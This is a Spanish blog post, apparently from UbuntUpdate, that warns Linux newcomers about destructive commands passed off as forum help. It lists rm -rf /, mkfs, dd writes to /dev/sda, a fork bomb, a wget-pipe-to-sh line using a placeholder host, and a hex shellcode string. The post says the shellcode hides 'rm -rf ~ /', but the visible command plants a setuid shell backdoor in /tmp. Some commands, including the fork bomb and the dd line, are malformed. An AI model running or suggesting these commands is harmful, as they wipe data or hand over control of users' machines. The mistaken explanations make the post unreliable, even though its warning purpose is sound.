Saludos camaradas
Hoy traigo en el apartado de seguridad una noticia que tenia que comentar, ya que nos afecta a todos los usuarios de Linux en general
Bien, como todos sabemos los usuarios de linux continuamente nos surgen pequeñas dudas a cerca de muchas cosas… instalaciones, comandos, compilaciones… se esta detectando por algunos foros gente que se dedica a responder a usuarios con poca experiencia de una manera poco “sana”
Es decir los usuarios tienen dudas, y un usuario “amigo” le responde que ejecute comandos.. que lo único que hace es perjudicar la maquina de esta persona.
En algunos foros están alertados con este problema, y amenazan con banear IP, ISP o lo que este en su mano con tal de acabar con estas farsas
Algunos “cazados” se defienden diciendo que es una broma…
joder con las bromas !!
Esto claro no ha convencido a los moderadores de los foros!!
la putada que haces a un usuario que esta aprendiendo es infinita
Bueno, hemos recopilado una serie de comandos que pueden ser perjudiciales para la maquina… espero que esto sirva para
que estéis alertados y no puedan engañaros con falsas ayudas
Todos sabemos la potencia de la Shell de Linux, no hay que temerla pero si respetarla
1º Borrar todos los archivos, borrar directorio actual, borrar ficheros de directorio
Comando:
rm -rf /
rm -rf .
rm -rf *
2º Borrar el directorio actual, el vinculo con el directorio anterior ( suprimir todo lo que esta por encima
de este nivel)
Comando:
rm -r .[^.]*
3º Formato. Los datos de esta unidad serán destruidos con el comando mkfs
y la partición sera sustituida por ficheros en blanco
Comando:
mkfs
mkfs.ext3
mkfs.anything
4º Manipulación de los bloques de disco.. escribe en los bloques causando la perdida
total de datos
Comando:
un_comando > /dev/sda
dd if=ejemplo=/dev/sda
5º Ejecutar un gran numero de procesos… bloqueando el sistema por completo y obligando
ha resetear la maquina ( posible perdidas de datos en reinicio en caliente)
Comando:
){:|:&};:
nota: puede parecer raro y curioso este comando… pero no lo pruebes, por si acaso !! 
6º Shellscript: Alguien le da el enlace a un shellscript a ejecutar. Esto puede contener cualquier comando ( malos y buenos )
No ejecutar código de gente que no confía, simplemente
Comando:
wget http://ejemplo/archivo.ejemplo
sh ./archivo_malo
wget http://ejemplo/archivo.ejemplo -O- | sh
7º TarBomb: esto consiste en que alguien te pide que descomprimas en un directorio importante
como por ejemplo /var
Este archivo tar puede ser creado para realizar ciertas tareas como dañar ciertos
archivos…
Nuestra precaución tiene que ser siempre descomprimir en directorios vacíos o creados
para la ocasión, de esta manera evitamos el llamado TarBom
8º Descompresión Bom: Consiste en un archivo comprimido ( no importa el formato )
que aparentemente es una pequeña descarga pero en realidad
esta altamente comprimido de tal manera que cuando iniciemos
la extracción se convertirá en GB llenando el disco y haciendo inoperativa
la maquina
9º Compilación de código: Alguien nos da un código para compilar, es fácil esconder entre tantas
lineas código malicioso… el atacante puede disfrazarlo como código
útil!! no compilar o ejecutar código compilado a menos que sea de una
fuente útil… ( pagina de autor, una dirección de Ubuntu, etc)
Un ejemplo útil de lo antes mencionado seria una lista de correo que comprueba “sudo”
y lo ejecuta… “sudo” le otorga privilegios en la maquina
Un ejemplo de código seria a si:
Comando:
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
A simple vista esto parece código hexadecimal, o cosas incomprensibles para usuarios inexpertos
o no tanto!! pero lo que esconde esto es el comando “rm-rf ~ /” esto destruye el directorio “home”
de un usuario con privilegios de “root” como ves este comando esta disfrazado entre la cadena
hexadecimal a si que es poco probable de detectar ( si eres capaz de detectarlo sabes leer matrix )
Estos son algunos ejemplos, si conoces mas no dudes en mandarlos y nosotros los publicaremos
encantados por el bien de todos nosotros
Desde UbuntUpdate esperamos que esto te sirva de ayuda… para ser un poco mas cauto de
lo que puede pasar si no tenemos algo de cuidado, en ningún caso queremos que estos ejemplos
sirvan para animar a nadie a un uso inapropiado y por su puesto no nos hacemos responsables de
el uso indebido o accidental de esta información
Saludos
Gracias a jdong de los foros de Ubuntu por todo
